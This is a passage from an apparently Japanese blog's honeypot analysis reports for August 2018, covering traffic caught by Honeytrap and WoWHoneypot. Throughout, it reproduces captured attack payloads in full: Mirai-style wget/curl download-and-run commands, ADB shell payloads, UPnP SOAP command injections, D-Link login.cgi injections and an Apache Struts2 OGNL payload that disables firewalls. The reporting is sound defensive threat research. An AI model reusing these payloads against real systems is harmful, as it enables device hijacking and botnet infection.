ちょっと、前の解析となりますが、8月20日の解析結果となります。今日は頑張って、昨日分まで出来ればと思っています。
マルウェアも一部ダウンロード可能なものがあったため、時間があるときにできるとことまで、解析出来ればと思っています。 

Honeytrap(2018/8/20)
検知数：6750件(0byte以上 3623件)

 宛先ポートの傾向に大きな変化はありませんでした。マルウェアダウンロードについては一部のURLが調査時点では生きている状態でした。

<マルウェアダウンロード> 
ポート：52869
→Mirai関連のマルウェア
POST /picsdesc.xml HTTP/1.1
・wget hxxp://159[.]65[.]232[.]56/xd.mips
・wget hxxp://107[.]191[.]99[.]41/elf.mips
・wget hxxp://80[.]211[.]112[.]150/mips
・wget hxxp://142[.]93[.]1[.]75/hoho.mips

ポート：5555
→VTに登録なし
・shell:cd /data/local/tmp;wget hxxp://207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp://207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp://207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp://207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;
・shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; busybox wget hxxp://95[.]215[.]62[.]169/adbs -O -> adbs; sh adbs; rm adbs.

ポート：8081
→Mirai関連のマルウェア
POST /HNAP1/ HTTP/1.0
・wget hxxp://50[.]115[.]166[.]136/bin

ポート：37215
→Mirai関連のマルウェア
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
・wget 209[.]141[.]33[.]86
・wget hxxp://80[.]211[.]112[.]95/sensi.sh

 以上、簡易分析となります。 

約1週間程度のログが溜まったので、１週間でどのぐらいの情報が集められたかをまとめてみました。 普段からハニーポットを持っている人は自宅のハニーポットの比較、ハニーポットを初めたいと思っている人はどんな情報を集められるか知ってもらえればいいなーと思って、この記事を書きました。

現在、運用しているのは WoWHoneypotとHoneytrapで、解析基盤には Splunkを利用しています。Splunkはある程度自動的にログを正規化してくれるので、GUIで分析したい人には結構おすすめです。分析方法はまだまだ模索段階なので、ある程度まとまったら記事にして共有したいと思います。

マルウェアの分析もしたいと思いますが、ダウンロード不可になっているものも多く、ある程度リアルタイムで見ていないと、分析は厳しいかもしれません。今回検知したURLもダウンロード出来ないものが多数でした。単純にマルウェアを捕獲したいと考えている人は ハニーポットのCowrieで擬似的に攻撃者を侵入させ、ファイルをローカルにダウンロードさせる方が収集できると思います。

それでは、2018/8/11 - 8/17 の分析結果は以下となります。

Honeytrap
1.検知傾向

宛先ポート別の円グラフ （左:データサイズ 0byte 右:データサイズ 1byte以上）

1日の平均検知数はおよそ7,500件であり、うちおよそ半分はポートが空いているかの調査行為でした。データサイズの有無に関わらずに検知数が多かったポートは 445ポートとなります。ペイロードの全てを見ていないので断定することは出来ないですが、EternalBlue 実行のための調査行為もしくは EternalBlue による攻撃行為ではないか推測します。実際に、セキュリティベンダーのレポートからも EternalBlue による被害が多数確認されているとの報告もあります[1]。ハニーポットでこれだけ検知していることを考えるとまだまだ攻撃に利用されていると思いますので、 外部にポート 445  を公開しないよう注意が必要だと判断します（そもそも、この記事を読んでいる人でポート445の危険性を分かっていない人はいないと思いますが。。。）

次にデータサイズが1byte以上で普段は見ないポートとして、52869ポートの検知が多くあります。このポートで検知していた攻撃は CVE-2014-8361 の脆弱性を狙った攻撃です[2]。対象製品はD-Link xxx シリーズおよびRealtek SDK（いずれもルータ）であり、今流行りのIoTボットへの感染を狙ったものです。

＜マルウェアダウンロード＞
ポート 37215
① Huawei HG532 の脆弱性を狙った攻撃（CVE-2017-17215）
→ アクセス先からマルウェアのダウンロード不可であり、特定は出来ませんでしたが、おそらくMirai関連のマルウェアと思われます。
POST /ctrlt/DeviceUpgrade_1 http/1.1
Content-Length: 430
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1",
response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"

<?xml version="1.0" ?><s:Envelope xmlns:s="hxxp://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="hxxp://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm -rf /tmp/*; /bin/busybox wget -g xxx[.]xx[.]xx[.]xxx -l /tmp/o20Xz -r /huawei; /bin/busybox chmod 777 * /tmp/o20Xz; /tmp/o20Xz huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

ポート 52869
① Huawei HG532 の脆弱性を狙った攻撃（CVE-2017-17215）
→ アクセス先からマルウェアのダウンロード不可であり、特定は出来ませんでしたが、おそらくMirai関連のマルウェアと思われます。

POST /ctrlt/DeviceUpgrade_1 http/1.1
Content-Length: 430
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", resPOST /picsdesc.xml http/1.1
Content-Length: 630
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
User-Agent: Hello-World
Connection: keep-alive

<?xml version="1.0" ?><s:Envelope xmlns:s="hxxp://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="hxxp://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var/; wget hxxp://xxx.xx.xx.xx/mips -O bt; chmod +x bt; ./bt mips`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>

②D-Link xxx シリーズおよびRealtek SDKの脆弱性を狙った攻撃（CVE-2014-8361）

   →Mirai関連のマルウェアとなります。
POST /picsdesc.xml http/1.1
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
User-Agent: Hello-World

<?xml version="1.0" ?><s:Envelope xmlns:s="hxxp://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="hxxp://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var/; wget hxxp://xxx.xxx.xx.xx/mips -O am; chmod +x am; ./am mips`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>

ポート 8080:
① D-Link の脆弱性 を狙った攻撃
　→Mirai亜種LMAO/2.0 のダウンロードを狙った攻撃を思われます。
GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://xxx.xxx.xx.xx/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ http/1.1
User-Agent: LMAO/2.0

ポート 5555:
Android Debug Bridge (ADB) の脆弱性を狙った攻撃

→IoTボットへの感染を狙った攻撃と思われます。
shell:cd /data/local/tmp;wget hxxp://xxx.xxx.xx.xxx/br -O- >br;sh br;busybox wget hxxp://xxx.xxx.xx.xxx/r -O- >r;sh r;curl hxxp://xxx.xxx.xx.xxx/c >c;sh c;busybox curl hxxp://xxx.xxx.xx.xxx/bc >bc;sh bc;rm -rf bc br r c;.


WoWHoneypot
1.検知傾向

WoWHoneypotは1日平均70件の検知でした。8/12はスキャンツールを回されたために増加した件数となっています。検知したパスおよびクエリのTOP10は以下となっています。
＜検知したパスおよびクエリのTOP10＞

検知した大半が調査行為であり、実際に攻撃を仕掛けているものは少数でした。その中でも、2017年のApache Struts2の脆弱性を狙ったものを多く検知していました。PoCコードが公開されているおよび任意のコードが実行可能であることから、未だに検知し続けていると推測します。
今回、検知したものの中で任意のコード実行を狙っていた攻撃は以下となっています。

①Apache Struts2 の脆弱性(CVE-2017-5638) の脆弱性を狙った攻撃 
→ マルウェアのダウンロードはうまく出来なかったため、脆弱性があるかの調査行為。もしくはリンク切れが想定されます。前から検知している攻撃手法で流れは以下となります。

1. iptableやSuSEfirewall2を停止

2.マルウェアをダウンロード

3. パーミッションを変更して、マルウェアを実行

GET /index.action HTTP/1.1
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):*1.(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c hxxp://xxx.xxxxx.xxx:xxxxxx/linux;chmod 777 linux;./linux;').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

②D-Linkの脆弱性を狙った攻撃
→いずれも Mirai系のマルウェアであり、User-Agentに特徴があります。

例：LMAOやHakai など

GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://xxx.xxx.xx.xx/k%20-O%20-%3E%20/tmp/k;sh%20/tmp/k%27$ HTTP/1.1
User-Agent: Hello, World

GET /login.cgi?cli=aa%20aa%27;wget%20http://xxx.xxx.xx.xx/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1
User-Agent: LMAO/2.0

GET /login.cgi?cli=aa%20aa%27;wget%20http://xx.xxx.xxx.xx/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1
User-Agent: Hakai/2.0

今回は初回であることもあり、気合いを入れて作成してみました。
分析は以上となります。マルウェアの詳細な解析などは時間があるときに実施しようと思っており、月次レポート作成時に報告出来ればと思っています。

＜参考＞
[1] サイバー救急センターレポート 第4号 PDF版
https://www.lac.co.jp/lacwatch/pdf/20180815_cecreport_vol4.pdf

[2]Realtek SDK - Miniigd UPnP SOAP Command Execution (Metasploit)
https://www.exploit-db.com/exploits/37169/

＜検知したWoWHoneypotのパスおよびクエリ一覧＞

今回は、2日分をまとめて分析しています。１週間分のログも溜まってたので、休み中に頑張って、週次レポート的なものは作りたいと思います。

Honeytrap分析
8月16日(木) 
検知数：7044件（ペイロード有：2905件）
＜宛先ポート別 TOP10＞

8月17日(金) 
検知数：5697件（ペイロード有：2895 件）
＜宛先ポート別 TOP10＞

＜マルウェアダウンロード＞

いずれもIoTを狙ったものと思われます。

ポート：52869 
ペイロード：
POST /picsdesc.xml
・cd /tmp/;wget hxxp://107[.]191[.]99[.]41/elf[.]mips -O elf
・cd /var/; wget hxxp://80[.]211[.]67[.]245/mips -O am; chmod +x am; [.]/am mips
・cd /tmp/;wget hxxp://159[.]65[.]232[.]56/xd[.]mips
・cd /tmp/;wget hxxp://167[.]99[.]196[.]170/xd[.]mips

ポート：5555
ペイロード：
・sshell:cd /data/local/tmp;wget hxxp://207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp://207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp://207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp://207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;

・shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget hxxp://185[.]162[.]130[.]187/adbs -O -> adbs; sh adbs; curl hxxp://185[.]162[.]130[.]187/adbs2 > adbs2; sh adbs2; rm adbs adbs2

日次の分析では、マルウェアの分析と急増したポートに関しての考察をしていこうかなと思っています。結構細かく見ようとすると大変なので。。。。。

以上、ハニーポットの分析でした。